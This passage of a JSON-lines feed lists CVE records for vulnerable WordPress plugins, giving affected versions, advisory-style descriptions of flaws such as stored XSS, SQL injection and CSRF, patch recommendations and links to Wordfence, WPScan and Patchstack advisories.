files.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/380c646c-fd95-408a-89eb-3e646768bbc5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/380c646c-fd95-408a-89eb-3e646768bbc5?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/buddyforms\\\/trunk\\\/includes\\\/functions.php#L1493\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/buddyforms\\\/trunk\\\/includes\\\/functions.php#L1493\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3046092\\\/buddyforms\\\/trunk?contextall=1&old=3031945&old_path=%2Fbuddyforms%2Ftrunk#file7\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3046092\\\/buddyforms\\\/trunk?contextall=1&old=3031945&old_path=%2Fbuddyforms%2Ftrunk#file7\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4529","slug":"business-card-by-esterox-100","versionImpact":"1.0.0","description":"The Business Card WordPress plugin through 1.0.0 does not have CSRF checks in some places, which could allow attackers to make logged in users perform unwanted actions such as deleting card categories via CSRF attacks","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/082ff0b8-2ecd-4292-832d-0a79e1ba8cb3\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/082ff0b8-2ecd-4292-832d-0a79e1ba8cb3\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5787","slug":"powerpack-lite-for-elementor","versionImpact":"2.7.20","description":"The PowerPack Addons for Elementor (Free Widgets, Extensions and Templates) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'url' attribute within the plugin's Link Effects widget in all versions up to, and including, 2.7.20 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ce55230e-8c9e-41aa-b107-16c5988d1feb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ce55230e-8c9e-41aa-b107-16c5988d1feb?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/powerpack-lite-for-elementor\\\/tags\\\/2.7.20\\\/modules\\\/link-effects\\\/widgets\\\/link-effects.php#L482\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/powerpack-lite-for-elementor\\\/tags\\\/2.7.20\\\/modules\\\/link-effects\\\/widgets\\\/link-effects.php#L482\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3101651\\\/#file331\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3101651\\\/#file331\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/powerpack-lite-for-elementor\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/powerpack-lite-for-elementor\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-54213","slug":"zionbuilder","versionImpact":"3.6.14","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in zionbuilder.io WordPress Page Builder \u2013 Zion Builder allows Stored XSS.This issue affects WordPress Page Builder \u2013 Zion Builder: from n\/a through 3.6.12.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/zionbuilder\\\/vulnerability\\\/wordpress-wordpress-page-builder-zion-builder-plugin-3-6-12-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/zionbuilder\\\/vulnerability\\\/wordpress-wordpress-page-builder-zion-builder-plugin-3-6-12-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11841","slug":"wp-tithely","versionImpact":"1.1","description":"The Tithe.ly Giving Button WordPress plugin through 1.1 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e344c722-c9b3-4527-a50d-50cdf07ebace\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e344c722-c9b3-4527-a50d-50cdf07ebace\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-31547","slug":"uptime-robot-monitor","versionImpact":"2.3","description":"Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Aphotrax Uptime Robot Plugin for WordPress allows SQL Injection. This issue affects Uptime Robot Plugin for WordPress: from n\/a through 2.3.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/uptime-robot-monitor\\\/vulnerability\\\/wordpress-uptime-robot-plugin-for-wordpress-plugin-2-3-sql-injection-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/uptime-robot-monitor\\\/vulnerability\\\/wordpress-uptime-robot-plugin-for-wordpress-plugin-2-3-sql-injection-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0277","slug":"wc-fields-factory","versionImpact":"4.1.5","description":"The WC Fields Factory WordPress plugin through 4.1.5 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users such as admin","refs":"[{\"url\":\"https:\\\/\\\/bulletin.iese.de\\\/post\\\/wc-fields-factory_1-4-5\",\"name\":\"https:\\\/\\\/bulletin.iese.de\\\/post\\\/wc-fields-factory_1-4-5\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/69ffb2f1-b291-49bf-80a8-08d03ceca53b\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/69ffb2f1-b291-49bf-80a8-08d03ceca53b\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4362","slug":"kiwi-social-share","description":"The Kiwi Social Share plugin for WordPress is vulnerable to authorization bypass due to a missing capability check on the kiwi_social_share_get_option() function called via the kiwi_social_share_get_option AJAX action in version 2.1.0. This makes it possible for unauthenticated attackers to read and modify arbitrary options on a WordPress site that can be used for complete site takeover. This was a previously fixed vulnerability that was reintroduced in this version.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8148b6d0-190a-4b97-8af7-edd6943116d1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8148b6d0-190a-4b97-8af7-edd6943116d1?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/wordpress-kiwi-social-sharing-plugin-fixed-critical-vulnerability\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/wordpress-kiwi-social-sharing-plugin-fixed-critical-vulnerability\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/kiwi-social-share\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/kiwi-social-share\\\/#developers\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4400","slug":"better-search","versionImpact":"2.5.2","description":"The Better Search plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 2.5.2. This is due to missing or incorrect nonce validation on the bsearch_process_settings_import() and bsearch_process_settings_export() functions. This makes it possible for unauthenticated attackers to import and export settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2473344%40better-search&new=2473344%40better-search&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2473344%40better-search&new=2473344%40better-search&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7acbcf74-2bae-412b-bf9d-70287a91deea?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7acbcf74-2bae-412b-bf9d-70287a91deea?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4023","slug":"all-users-messenger","versionImpact":"1.24","description":"The All Users Messenger WordPress plugin through 1.24 does not prevent non-administrator users from deleting messages from the all-users messenger.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/682c0226-28bd-4051-830d-8b679626213d\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/682c0226-28bd-4051-830d-8b679626213d\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1169","slug":"buddyforms","versionImpact":"2.8.7","description":"The Post Form \u2013 Registration Form \u2013 Profile Form for User Profiles \u2013 Frontend Content Forms for User Submissions (UGC) plugin for WordPress is vulnerable to unauthorized media upload due to a missing capability check on the buddyforms_upload_handle_dropped_media function in all versions up to, and including, 2.8.7. This makes it possible for unauthenticated attackers to upload media files.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6d14a90d-65ea-45da-956b-0735e2e2b538?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6d14a90d-65ea-45da-956b-0735e2e2b538?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/buddyforms\\\/trunk\\\/includes\\\/functions.php#L1466\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/buddyforms\\\/trunk\\\/includes\\\/functions.php#L1466\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3046092\\\/buddyforms\\\/trunk\\\/includes\\\/functions.php?contextall=1&old=3023795&old_path=%2Fbuddyforms%2Ftrunk%2Fincludes%2Ffunctions.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3046092\\\/buddyforms\\\/trunk\\\/includes\\\/functions.php?contextall=1&old=3023795&old_path=%2Fbuddyforms%2Ftrunk%2Fincludes%2Ffunctions.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5757","slug":"header-footer-elementor","versionImpact":"1.6.35","description":"The Elementor Header & Footer Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the url  attribute within the plugin's Site Title widget in all versions up to, and including, 1.6.35 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b5ab022c-c16c-488b-b004-a7351f8fa3d3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b5ab022c-c16c-488b-b004-a7351f8fa3d3?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/header-footer-elementor\\\/tags\\\/1.6.35\\\/inc\\\/widgets-manager\\\/widgets\\\/class-site-title.php#L461\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/header-footer-elementor\\\/tags\\\/1.6.35\\\/inc\\\/widgets-manager\\\/widgets\\\/class-site-title.php#L461\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/header-footer-elementor\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/header-footer-elementor\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3101672\\\/#file3\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3101672\\\/#file3\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8481","slug":"wp-special-textboxes","versionImpact":"6.2.2","description":"The The Special Text Boxes plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 6.2.2. This is due to the plugin adding the filter add_filter('comment_text', 'do_shortcode'); which will run all shortcodes in comments. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/15b2a08f-2122-4eaf-ab46-1945cf6a68ca?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/15b2a08f-2122-4eaf-ab46-1945cf6a68ca?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-special-textboxes\\\/trunk\\\/stb-class.php#L36\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-special-textboxes\\\/trunk\\\/stb-class.php#L36\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9670","slug":"2d-tag-cloud-widget-by-sujin","versionImpact":"6.0.2","description":"The 2D Tag Cloud plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 6.0.2. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9dad1be5-ea6c-40fa-bb21-862e7fd8804a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9dad1be5-ea6c-40fa-bb21-862e7fd8804a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/2d-tag-cloud-widget-by-sujin\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/2d-tag-cloud-widget-by-sujin\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/2d-tag-cloud-widget-by-sujin\\\/trunk\\\/views\\\/admin-tabs.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/2d-tag-cloud-widget-by-sujin\\\/trunk\\\/views\\\/admin-tabs.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9708","slug":"easy-svg-upload","versionImpact":"1.0","description":"The Easy SVG Upload plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/49a9ade1-fca7-48c1-bb87-75fc3528e234?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/49a9ade1-fca7-48c1-bb87-75fc3528e234?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/easy-svg-upload\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/easy-svg-upload\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-54207","slug":"wp-auctions","versionImpact":"3.7","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Owen Cutajar & Hyder Jaffari WordPress Auction Plugin allows Stored XSS.This issue affects WordPress Auction Plugin: from n\/a through 3.7.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/wp-auctions\\\/vulnerability\\\/wordpress-wordpress-auction-plugin-plugin-3-7-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/wp-auctions\\\/vulnerability\\\/wordpress-wordpress-auction-plugin-plugin-3-7-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-7504","slug":"friends","description":"The Friends plugin for WordPress is vulnerable to PHP Object Injection in version 3.5.1 via deserialization of untrusted input of the query_vars parameter This makes it possible for authenticated attackers, with subscriber-level access and above, to inject a PHP Object. No known POP chain is present in the vulnerable software, which means this vulnerability has no impact unless another plugin or theme containing a POP chain is installed on the site. If a POP chain is present via an additional plugin or theme installed on the target system, it may allow the attacker to perform actions like delete arbitrary files, retrieve sensitive data, or execute code depending on the POP chain present. This requires access to the sites SALT_NONCE and and SALT_KEY to exploit.","refs":"[{\"url\":\"https:\\\/\\\/drive.google.com\\\/file\\\/d\\\/1K-_AcDk9BhUa0kSQ_M-UUnLgmnYJTA0l\\\/view\",\"name\":\"https:\\\/\\\/drive.google.com\\\/file\\\/d\\\/1K-_AcDk9BhUa0kSQ_M-UUnLgmnYJTA0l\\\/view\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/akirk\\\/friends\\\/pull\\\/537\",\"name\":\"https:\\\/\\\/github.com\\\/akirk\\\/friends\\\/pull\\\/537\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3306684%40friends&new=3306684%40friends&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3306684%40friends&new=3306684%40friends&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/friends\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/friends\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cf91d75e-cef4-4154-aa16-6ca96db9c5bb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cf91d75e-cef4-4154-aa16-6ca96db9c5bb?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0586","slug":"all-in-one-seo-pack","versionImpact":"4.2.9","description":"The All in One SEO Pack plugin for WordPress is vulnerable to Stored Cross-Site Scripting via multiple parameters in versions up to, and including, 4.2.9 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers with Contributor+ role to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/all-in-one-seo-pack\\\/tags\\\/4.2.9\\\/app\\\/Common\\\/Admin\\\/PostSettings.php?v=2829340#L202\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/all-in-one-seo-pack\\\/tags\\\/4.2.9\\\/app\\\/Common\\\/Admin\\\/PostSettings.php?v=2829340#L202\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2859011%40all-in-one-seo-pack%2Ftrunk&old=2847431%40all-in-one-seo-pack%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2859011%40all-in-one-seo-pack%2Ftrunk&old=2847431%40all-in-one-seo-pack%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1c13f00e-3048-44cf-8979-2b0b0c508f3a\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1c13f00e-3048-44cf-8979-2b0b0c508f3a\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4361","slug":"wp-jobsearch","versionImpact":"1.8.1","description":"The JobSearch WP Job Board plugin for WordPress is vulnerable to authorization bypass due to a missing capability check on the jobsearch_job_integrations_settin_save AJAX action in versions up to, and including, 1.8.1. This makes it possible for authenticated attackers to update arbitrary options on the site.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/839a0cc0-a656-4107-a748-4ad85e950237?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/839a0cc0-a656-4107-a748-4ad85e950237?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a69aa52f-9876-4180-97a4-713459b43f24\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a69aa52f-9876-4180-97a4-713459b43f24\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/wordpress-jobsearch-wp-job-board-plugin-fixed-vulnerability\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/wordpress-jobsearch-wp-job-board-plugin-fixed-vulnerability\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9656","slug":"mynx-page-builder","versionImpact":"0.27.8","description":"The Mynx Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 0.27.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/73a25208-81fe-4337-a344-1c129bd80862?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/73a25208-81fe-4337-a344-1c129bd80862?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/mynx-page-builder\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/mynx-page-builder\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10544","slug":"woo-manage-fraud-orders","versionImpact":"2.6.1","description":"The Woo Manage Fraud Orders plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 6.1.7 through publicly exposed log files. This makes it possible for unauthenticated attackers to view potentially sensitive information about users contained in the exposed log files.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a62df5f6-64b0-4489-9dde-0d472040ee12?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a62df5f6-64b0-4489-9dde-0d472040ee12?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-manage-fraud-orders\\\/trunk\\\/includes\\\/class-wmfo-debug-log.php#L25\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-manage-fraud-orders\\\/trunk\\\/includes\\\/class-wmfo-debug-log.php#L25\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-51615","slug":"wp-auctions","versionImpact":"3.7","description":"Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Owen Cutajar & Hyder Jaffari WordPress Auction Plugin allows SQL Injection.This issue affects WordPress Auction Plugin: from n\/a through 3.7.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/wp-auctions\\\/vulnerability\\\/wordpress-wordpress-auction-plugin-plugin-3-7-sql-injection-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/wp-auctions\\\/vulnerability\\\/wordpress-wordpress-auction-plugin-plugin-3-7-sql-injection-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12735","slug":"advance-post-prefix","versionImpact":"1.1.1","description":"The Advance Post Prefix WordPress plugin through 1.1.1 does not sanitize and escape a parameter before using it in a SQL statement, allowing admins and above to perform SQL injection attacks","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1b355399-e92b-46aa-ada1-95e99fc03976\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1b355399-e92b-46aa-ada1-95e99fc03976\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
